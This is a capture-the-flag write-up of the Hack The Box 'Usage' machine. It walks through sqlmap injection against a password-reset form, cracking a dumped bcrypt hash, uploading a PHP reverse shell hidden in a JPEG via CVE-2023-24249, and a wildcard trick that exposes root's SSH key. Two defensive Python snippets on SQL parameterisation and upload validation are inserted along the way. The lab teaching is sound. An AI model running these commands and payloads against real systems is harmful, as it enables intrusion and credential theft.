Hack The Box - Usage

06 May 2024 . tech
#tutorial

Reconnaissance and Initial Steps

Nmap Results

image

I add usage.htb to /etc/hosts with the given IP address, then navigate to http://usage.htb.

echo "10.10.11.18   usage.htb" | sudo tee -a /etc/hosts

image

Subdomain Enumeration

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.usage.htb" -u http://usage.htb -fs 154

image

This turned up admin.usage.htb, which I also added to /etc/hosts.

echo "10.10.11.18    admin.usage.htb" | sudo tee -a /etc/hosts

image

Whatweb

whatweb 10.10.11.18

image

I identified that this website is built with the Laravel framework.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/laravel

User Flag

After checking out the Password Reset Option and finding it interesting, I fired up Burp Suite. I captured the POST request, as shown below:

image

image

image

I copied the POST request to a text file, which I named request.txt. The trailing asterisk after email= marks the injection point for sqlmap:

POST /forget-password HTTP/1.1
Host: usage.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://usage.htb
Connection: close
Referer: http://usage.htb/forget-password
Cookie: XSRF-TOKEN=eyJpdiI6IkVMOEV1aUo4VjFHSEw3VEIzeERyRVE9PSIsInZhbHVlIjoiR3R4aVJxRWxMakUvNE1oVkQ0SS9DR3Q1T3FBTnZvS2JTY3R3dlFnZEJ2Z2NhaUp2V0FKTGtJSVdUS2VnK3crSlNrUEFnS2NQMXBBQllrWWJtYmdMR0w1SzdxR2dGY3lsT1BHeVRGNXp3bEttWUNRNmRBSkk4RXkxS0xYK1pOb0wiLCJtYWMiOiJlMzkyYTY1YzJjOGQ2MDdiNWI3MTRiZGIxYzk2N2FlMzNiYzFlNjZiZjk4NWE4MDkyYWE3NjgxMGI5NTMxMjgyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjUxUE5tOW5TYlAxd0FFQ3p2YjhEaXc9PSIsInZhbHVlIjoiTGl0Y3hFZU81Y2F2anNXcXNXa3pVd0RwNHcvYjMzbHBSWTlISW80VjZBSzVjTTZDd3FKVkhiNnhPdDVDejNYK2RVNDcvSERMOGc2dzNFMHpycTBSeGZSemk2TEZyZk5QWDE2N05YM21GcWFDcHJRSjVGSTRFajVhSTBOR0IvOTEiLCJtYWMiOiJiYzYwMDUyMGQzMTk2ODM2ZDkxMTI1NjhmYWFmYmU3YjgxZjMzMjUzZGExYWE1YTQ0MTA1NGI4NjMwYmFhMDU4IiwidGFnIjoiIn0%3D
Upgrade-Insecure-Requests: 1

_token=jElJgEoOoONVCfBoDfa67TPzd6VxBk4o43ObgKlY&email=1*

Now, let’s fire up SQLMap.

sqlmap -r request.txt --level 5 --risk 3 --batch

image

sqlmap -r request.txt --level 5 --risk 3 --batch --dbs

image

sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog --tables

image

sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog -T admin_users --columns

image

sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog -T admin_users -C username,password --dump

image
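The forget-password lookup is exploitable because the email field ends up inside the SQL text. As an added illustration (not code from the box or from laravel-admin), here is the interpolating pattern next to the parameterised one, run against a constructed in-memory stand-in for admin_users; the email column, the rows and the EMAIL_RE shape check are assumptions for the example.

```python
import re
import sqlite3

# Constructed stand-in for the usage_blog.admin_users table dumped above; the email
# column and the rows are assumptions for this example, not data from the box.
SEED_ROWS = [
    ("admin", "admin@usage.htb", "<bcrypt hash placeholder>"),
    ("editor", "editor@usage.htb", "<bcrypt hash placeholder>"),
]
# Strict shape check for the one field the forget-password form accepts.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_users (username TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin_users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> list[str]:
    """Interpolates the request field into the SQL text: the pattern sqlmap exploits."""
    sql = f"SELECT username FROM admin_users WHERE email = '{email}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, email: str) -> list[str]:
    """Binds the value as a parameter, so it is compared as data and never parsed as SQL."""
    if not EMAIL_RE.fullmatch(email):
        return []  # reject anything not shaped like an address before touching the DB
    rows = conn.execute("SELECT username FROM admin_users WHERE email = ?", (email,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    crafted = "x@usage.htb' OR '1'='1"  # closes the quote in the interpolated query
    print("vulnerable:", lookup_vulnerable(db, crafted))  # every row comes back
    print("safe:      ", lookup_safe(db, crafted))        # nothing
```

In Laravel the safe variant corresponds to the query builder's bound `where('email', $email)`; the risk appears when user input is concatenated into `whereRaw()` or `DB::raw()` strings.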

So I copied the hash and saved it to pass.txt (single quotes, so the shell does not expand the $ characters in the bcrypt hash):

echo '$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2' > pass.txt

Let’s use john to crack it.

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

image

I used these credentials to log in to the admin portal (admin : whatever1).

image

image

Searching for recent vulnerabilities turned up an advisory about laravel-admin having an arbitrary file upload vulnerability (CVE-2023-24249). The affected version number listed is 1.8.19, and the version running on this system is 1.8.18, so it should be affected as well. I finally found this article:

https://flyd.uk/post/cve-2023-24249/

Let’s prepare the webshell. Here we use Kali’s PHP reverse shell located at /usr/share/webshells/php/php-reverse-shell.php, modify the IP (tun0) and port (4444), and then use 010editor to embed it inside an image file (an image/PHP polyglot).

cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php

image

Now let’s download 010editor: https://www.sweetscape.com/download/010editor/

Let’s extract and run 010editor.

image

Then I went to http://admin.usage.htb, moved to the administrator settings and downloaded the admin image, as shown below:

image

Then I opened that image in 010editor (Open File, then select the image file):

image

In that image, I moved to the end of the header and pasted the selected php-reverse-shell code:

image

image

Then I saved the file as shell.jpg.

Initial Foothold

Let’s create a netcat listener:

nc -nlvp 4444

Then I fired up Burp Suite and intercepted the upload of shell.jpg.

image

Now we can change the filename to shell.jpg.php in the intercepted request and forward it:

image
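The bypass above works because the server trusts the client-supplied filename and only the bytes look like an image. As an added example (not code from laravel-admin or the box), a naive magic-byte check is shown beside a strict validator that judges the name, the bytes and their pairing, and assigns a server-chosen storage name; the sample bytes are constructed, with a harmless PHP tag standing in for the pasted shell.

```python
import os
import re
import secrets

ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}
# Leading bytes of the formats an avatar upload is meant to accept.
MAGIC = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)

def naive_check(filename: str, data: bytes) -> bool:
    """Looks only at the magic bytes: a JPEG header followed by PHP passes, whatever the name."""
    return any(data.startswith(magic) for magic in MAGIC)

def strict_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Returns (accepted, reason). Judges the name, the bytes and the pairing of the two."""
    parts = os.path.basename(filename).lower().split(".")
    # Exactly one extension: "shell.jpg.php" is rejected before the bytes are even read.
    if len(parts) != 2 or not parts[0] or "." + parts[1] not in ALLOWED:
        return False, "extension"
    ext = ".jpg" if parts[1] == "jpeg" else "." + parts[1]
    detected = next((e for m, e in MAGIC.items() if data.startswith(m)), None)
    if detected is None:
        return False, "magic"
    if detected != ext:
        return False, "mismatch"  # a PNG body under a .jpg name is also refused
    if PHP_TAG.search(data):
        return False, "embedded code"  # the body of shell.jpg, even under its own name
    return True, "ok"

def storage_name(ext: str) -> str:
    """Server-chosen name: the client-supplied filename never reaches the filesystem."""
    return secrets.token_hex(16) + ext

# Constructed samples: a minimal JPEG prefix, and the same prefix with a PHP tag behind it
# (a harmless marker standing in for the shell pasted after the header in the writeup).
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
POLYGLOT = b"\xff\xd8\xff\xe0" + b"<?php /* marker only */ ?>"

if __name__ == "__main__":
    for name, body in [("photo.jpg", CLEAN_JPEG), ("shell.jpg.php", POLYGLOT), ("shell.jpg", POLYGLOT)]:
        print(name, "naive:", naive_check(name, body), "strict:", strict_check(name, body))
```

Re-encoding accepted images with an image library and serving the upload directory with PHP execution disabled are the two controls that make a missed file inert even if a check is wrong.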

We got the reverse shell, so let’s grab user.txt:

image

Privilege Escalation

I was searching all the options to escalate privileges, but I couldn’t find anything. So, I tried listing all users on the system.

image

I realised I needed to locate Xander’s credentials, but how? Then I stumbled upon a file (.monitrc) that contained Xander’s credentials in plaintext.

image

ssh xander@usage.htb

image

root.txt

sudo -l

image

Since this is a custom binary, there is no GTFOBins entry for it. However, we can use the strings command to inspect what the binary does.

image

Let’s use the wildcard tricks described here: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks

image

So we were able to read root.txt. Let’s use the same method to get a root shell:

image

image

After creating the id_rsa file and setting the required permissions with chmod 600 id_rsa, I used SSH with the -i option to specify the private key and connect to the server.

image

image

BOOM !!! :D


Me

c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.